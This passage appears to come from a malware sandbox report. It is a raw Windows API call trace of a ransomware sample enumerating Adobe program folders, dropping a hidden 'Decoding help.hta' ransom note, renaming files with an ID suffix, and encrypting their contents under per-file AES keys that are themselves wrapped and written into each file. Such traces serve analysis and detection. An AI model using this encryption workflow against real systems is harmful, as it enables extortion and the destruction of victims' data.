Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.201] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.201] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.SVE" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SVE") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SVE" [0053.201] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SVE" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SVE") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SVE" [0053.201] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SVE", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SVE.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SVE.[ID]g9uZrLhJaygpwRm1[ID]" [0053.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SVE" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.sve"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SVE.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.sve.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.202] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d35bc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.TUR", cAlternateFileName="")) returned 1 [0053.202] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.202] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.202] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0053.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0053.202] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.202] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0053.202] CloseHandle (hObject=0xffffffff) returned 0 [0053.202] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0053.203] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.TUR") returned -1 [0053.203] lstrlenW (lpString="PDFShell.TUR") returned 12 [0053.203] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.203] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.203] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.TUR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.TUR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.TUR" [0053.203] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.TUR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.TUR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.TUR" [0053.203] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.TUR", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.TUR.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.TUR.[ID]g9uZrLhJaygpwRm1[ID]" [0053.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.TUR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.tur"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.TUR.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.tur.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.203] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d35bc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.UKR", cAlternateFileName="")) returned 1 [0053.203] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.203] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.203] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0053.203] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0053.203] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.203] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0053.203] CloseHandle (hObject=0xffffffff) returned 0 [0053.203] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0053.204] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.UKR") returned -1 [0053.204] lstrlenW (lpString="PDFShell.UKR") returned 12 [0053.204] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.204] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.204] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.UKR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.UKR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.UKR" [0053.204] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.UKR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.UKR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.UKR" [0053.204] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.UKR", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.UKR.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.UKR.[ID]g9uZrLhJaygpwRm1[ID]" [0053.204] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.UKR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ukr"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.UKR.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ukr.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.204] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d35bc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.UKR", cAlternateFileName="")) returned 0 [0053.204] FindClose (in: hFindFile=0x6718f0 | out: hFindFile=0x6718f0) returned 1 Thread: id = 497 os_tid = 0xc08 [0046.284] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*", lpFindFileData=0x1495fd30 | out: lpFindFileData=0x1495fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8386f760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8386f760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8386f760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a59f0 [0046.284] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0046.284] FindNextFileW (in: hFindFile=0x5a59f0, lpFindFileData=0x1495fd30 | out: lpFindFileData=0x1495fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8386f760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8386f760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8386f760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.284] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0046.284] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0046.285] FindNextFileW (in: hFindFile=0x5a59f0, lpFindFileData=0x1495fd30 | out: lpFindFileData=0x1495fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x838958c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x52ba8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcrobatUpdater.exe", cAlternateFileName="ACROBA~1.EXE")) returned 1 [0046.285] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" [0046.285] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned 57 [0046.285] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Decoding help.hta" [0046.285] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\decoding help.hta")) returned 0xffffffff [0046.285] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x60c [0046.285] WriteFile (in: hFile=0x60c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1495fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1495fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0046.286] CloseHandle (hObject=0x60c) returned 1 [0046.286] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0046.287] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcrobatUpdater.exe") returned 1 [0046.287] lstrlenW (lpString="AcrobatUpdater.exe") returned 18 [0046.287] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" [0046.287] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned 57 [0046.287] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\", lpString2="AcrobatUpdater.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe" [0046.287] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe" [0046.287] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0046.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\acrobatupdater.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\acrobatupdater.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.288] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\acrobatupdater.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x60c [0046.288] CreateFileMappingA (hFile=0x60c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x470 [0046.288] CryptAcquireContextA (in: phProv=0x1495fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1495fcec*=0x3448500) returned 1 [0046.289] CryptGenKey (in: hProv=0x3448500, Algid=0x6610, dwFlags=0x1, phKey=0x1495fce8 | out: phKey=0x1495fce8*=0x671870) returned 1 [0046.289] CryptExportKey (in: hKey=0x671870, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1495fbe4, pdwDataLen=0x1495fce4 | out: pbData=0x1495fbe4*, pdwDataLen=0x1495fce4*=0x2c) returned 1 [0046.289] MapViewOfFile (hFileMappingObject=0x470, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x52ba0) returned 0x7890000 [0046.330] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1495fbe4*, pdwDataLen=0x1495fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1495fbe4*, pdwDataLen=0x1495fcf8*=0x100) returned 1 [0046.331] CryptEncrypt (in: hKey=0x671870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x7890000, pdwDataLen=0x1495fce4*=0x52ba0, dwBufLen=0x52ba0 | out: pbData=0x7890000*, pdwDataLen=0x1495fce4*=0x52ba0) returned 1 [0046.816] UnmapViewOfFile (lpBaseAddress=0x7890000) returned 1 [0046.821] CloseHandle (hObject=0x470) returned 1 [0046.821] CryptDestroyKey (hKey=0x671870) returned 1 [0046.821] CryptReleaseContext (hProv=0x3448500, dwFlags=0x0) returned 1 [0046.821] SetFilePointerEx (in: hFile=0x60c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.821] WriteFile (in: hFile=0x60c, lpBuffer=0x1495fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1495fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1495fbe4*, lpNumberOfBytesWritten=0x1495fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.822] WriteFile (in: hFile=0x60c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1495fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1495fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.822] CloseHandle (hObject=0x60c) returned 1 [0046.826] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.826] FindNextFileW (in: hFindFile=0x5a59f0, lpFindFileData=0x1495fd30 | out: lpFindFileData=0x1495fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8386f760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe39c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeARM.exe", cAlternateFileName="")) returned 1 [0046.826] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" [0046.826] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned 57 [0046.826] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Decoding help.hta" [0046.826] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\decoding help.hta")) returned 0x1 [0046.827] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AdobeARM.exe") returned 1 [0046.827] lstrlenW (lpString="AdobeARM.exe") returned 12 [0046.827] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" [0046.827] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned 57 [0046.827] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\", lpString2="AdobeARM.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe" [0046.827] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe" [0046.827] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0046.827] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobearm.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobearm.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.828] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobearm.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x60c [0046.828] CreateFileMappingA (hFile=0x60c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x470 [0046.828] CryptAcquireContextA (in: phProv=0x1495fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1495fcec*=0x3448500) returned 1 [0046.829] CryptGenKey (in: hProv=0x3448500, Algid=0x6610, dwFlags=0x1, phKey=0x1495fce8 | out: phKey=0x1495fce8*=0x671af0) returned 1 [0046.829] CryptExportKey (in: hKey=0x671af0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1495fbe4, pdwDataLen=0x1495fce4 | out: pbData=0x1495fbe4*, 